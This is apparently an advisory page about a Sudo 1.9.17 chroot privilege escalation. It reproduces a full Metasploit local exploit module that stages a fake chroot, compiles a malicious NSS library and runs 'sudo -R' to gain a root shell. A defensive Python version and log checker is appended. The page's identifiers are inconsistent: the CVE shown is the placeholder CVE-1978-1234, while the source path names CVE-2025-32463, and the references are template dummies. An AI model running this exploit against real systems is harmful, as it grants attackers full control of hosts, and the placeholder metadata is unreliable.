Sudo Chroot 1.9.17 Privilege Escalation

Vulnerability Information

Vulnerability name: Sudo Chroot 1.9.17 Privilege Escalation

Vulnerability identifier:

  • CVE: CVE-1978-1234

Vulnerability type: Privilege escalation

Severity: High

Description: This vulnerability exists in Sudo version 1.9.17 and allows an attacker to escalate privileges through specific local operations. Sudo is a widely used program that lets system administrators authorize particular users to run certain commands as the superuser or as another user without knowing the root password. This mechanism is very common on Unix and Linux systems and is used to implement the principle of least privilege.

The technical root cause is a flaw in how Sudo handles chroot environments, which an attacker can exploit to bypass the intended privilege restrictions. Specifically, by constructing particular environment variables and a file layout, an attacker can induce Sudo to execute malicious code within the chroot environment and thereby obtain root privileges. Vulnerabilities of this kind are usually caused by insufficient input validation or incomplete environment isolation.

The impact of this vulnerability is extremely severe because it allows a local user to escalate to root without any form of authentication. This means an attacker can take complete control of the system, execute arbitrary commands, access all data, and even install persistent backdoors. Because Sudo is so widely deployed, this vulnerability poses a significant threat to many systems. An attacker can automate exploitation without any user interaction, which further increases the danger.

Product: Sudo

Affected version: 1.9.17

Source: https://github.com/rapid7/metasploit-framework/blob/54c4ba417ab176759cad31aba6672d984893d61e/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

Type: rapid7/metasploit-framework: GitHub issues

POC details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        # The Name should be just like the line of a Git commit - software name,
        # vuln type, class. Preferably apply
        # some search optimization so people can actually find the module.
        # We encourage consistency between module name and file name.
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in a Linux command for priv esc.
        },
        'License' => MSF_LICENSE,
        # The place to add your name/handle and email. Twitter and other contact info isn't handled here.
        # Add reference to additional authors, like those creating original proof of concepts or
        # reference materials.
        # It is also common to comment in who did what (PoC vs metasploit module, etc)
        'Author' => [
          'h00die <mike@stcyrsecurity.com>', # msf module
          'researcher' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        # from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but the exploit
        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Arch' => [ ARCH_CMD ],
        # What types of sessions we can use this module in conjunction with. Most modules use libraries
        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
        # test both to ensure compatibility.
        'SessionTypes' => [ 'shell' ],
        'Targets' => [[ 'Auto', {} ]],
        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
        # since privilege escalation modules typically result in elevated privileges, this is
        # generally set to true
        'Privileged' => true,
        'References' => [
          [ 'OSVDB', '12345' ],
          [ 'EDB', '12345' ],
          [ 'URL', 'http://www.example.com'],
          [ 'CVE', '1978-1234']
        ],
        'DisclosureDate' => '2023-11-29',
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
        # It's generally easiest just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0,
        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def check
    return CheckCode::Appears('Vulnerable app version detected')
    # Check the kernel version to see if its in a vulnerable range
    # we guard this because some distros have funky kernel versions https://github.com/rapid7/metasploit-framework/issues/19812
    # release = kernel_release
    # begin
    #   if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
    #      Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
    #     return CheckCode::Safe("Kernel version #{release} is not vulnerable")
    #   end
    # rescue ArgumentError => e
    #   return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
    # end
    # vprint_good "Kernel version #{release} appears to be vulnerable"
    #
    # # Check the app is installed and the version, debian based example
    # package = cmd_exec('dpkg -l example | grep \'^ii\'')
    # if package&.include?('1:2015.3.14AR.1-1build1')
    #   return CheckCode::Appears("Vulnerable app version #{package} detected")
    # end
    #
    # CheckCode::Safe("app #{package} is not vulnerable")
  end

  #
  # The exploit method drops a payload file to the system, then either compiles and runs
  # or just runs the exploit on the system.
  #
  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!/bin/bash\n" + payload.encoded)

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    # Fake chroot root (base_dir) plus a sibling libnss_ directory holding the shared object
    cmd_exec("mkdir -p #{base_dir}/etc libnss_")

    # nsswitch.conf inside the fake root names the NSS module that sudo will load
    cmd_exec(%(echo "passwd: /#{lib_filename}" \> #{base_dir}/etc/nsswitch.conf))

    cmd_exec("cp /etc/group #{base_dir}/etc")

    exploit_code = %<
      #include <stdlib.h>
      #include <unistd.h>

      __attribute__((constructor))
      void exploit(void) {
        setreuid(0,0);
        setregid(0,0);
        chdir("/");
        execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
      }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end
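The description above states that the flaw is in Sudo's chroot handling and lists 1.9.17 as the affected version, and the module shows the two artifacts such an attempt leaves behind: a writable fake root passed to sudo's -R option, and an NSS shared object loaded from it. As an added defender-side example (not part of this page, the Metasploit module, or the Sudo project), the following Python script does two things: it parses `sudo --version` output and compares it against the affected version stated on this page, and it scans sudo log lines for chroot invocations whose root lives under a user-writable path. The affected-version set is taken from this page only (treat any patch-level suffix as a separate release to verify against the vendor advisory), the `CHROOT=` log field is an assumption about sudo's log format, and the log lines are constructed samples.

```python
import re
import subprocess
from typing import Iterable, List, Optional, Tuple

# Affected version as stated on this page. A patch-level suffix such as "p1"
# makes a different release, which is deliberately NOT matched here; confirm
# such versions against the vendor advisory instead of this table.
AFFECTED_VERSIONS = {"1.9.17"}

# First line of `sudo --version` looks like "Sudo version 1.9.17" (optionally "1.9.17p1").
_VERSION_RE = re.compile(r"^Sudo version (\d+\.\d+\.\d+(?:p\d+)?)", re.MULTILINE)


def parse_sudo_version(output: str) -> Optional[str]:
    """Return the version token from `sudo --version` output, or None if absent."""
    match = _VERSION_RE.search(output)
    return match.group(1) if match else None


def is_affected_version(version: Optional[str]) -> bool:
    """True only for the exact version this page lists as affected."""
    return version in AFFECTED_VERSIONS


def check_local_sudo() -> Tuple[Optional[str], bool]:
    """Run `sudo --version` on this host and report (version, affected?)."""
    try:
        proc = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None, False
    version = parse_sudo_version(proc.stdout)
    return version, is_affected_version(version)


# Assumption: sudo records the -R/--chroot argument as a "CHROOT=<path>" field
# in its syslog/auth.log entry. Chroots rooted in user-writable locations are
# the case worth alerting on, because that is where an unprivileged user can
# stage an etc/nsswitch.conf and a libnss_*.so.2 of their own.
_SUDO_LOG_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s*:.*?\bCHROOT=(?P<chroot>\S+)")
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def find_suspicious_chroot_events(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (user, chroot_path) for sudo log entries that chroot into a user-writable path."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        match = _SUDO_LOG_RE.search(line)
        if not match:
            continue
        chroot = match.group("chroot")
        if chroot.startswith(USER_WRITABLE_PREFIXES):
            hits.append((match.group("user"), chroot))
    return hits


# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    "Jul 10 10:01:02 host sudo:     alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    "Jul 10 10:05:17 host sudo:     bob : TTY=pts/1 ; CHROOT=/tmp/x7k2q ; PWD=/tmp/x7k2q ; USER=root ; COMMAND=/x7k2q",
    "Jul 10 10:06:00 host sudo:     carol : TTY=pts/2 ; CHROOT=/srv/jail ; PWD=/ ; USER=root ; COMMAND=/bin/ls",
]


if __name__ == "__main__":
    version, affected = check_local_sudo()
    print(f"local sudo version: {version} affected-per-page: {affected}")
    for user, chroot in find_suspicious_chroot_events(SAMPLE_LOG):
        print(f"ALERT user={user} chroot into user-writable path {chroot}")
```

Only the second sample line is reported: it matches the page's pattern of a chroot root under the writable directory, while the administrator-owned /srv/jail chroot and the plain apt invocation pass. Feed real lines in with `find_suspicious_chroot_events(open("/var/log/auth.log"))` after confirming that your sudo build emits the CHROOT= field.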

http://example.com/2025/07/10/github_3491847199/
Author
lianccc
Published
10 July 2025
License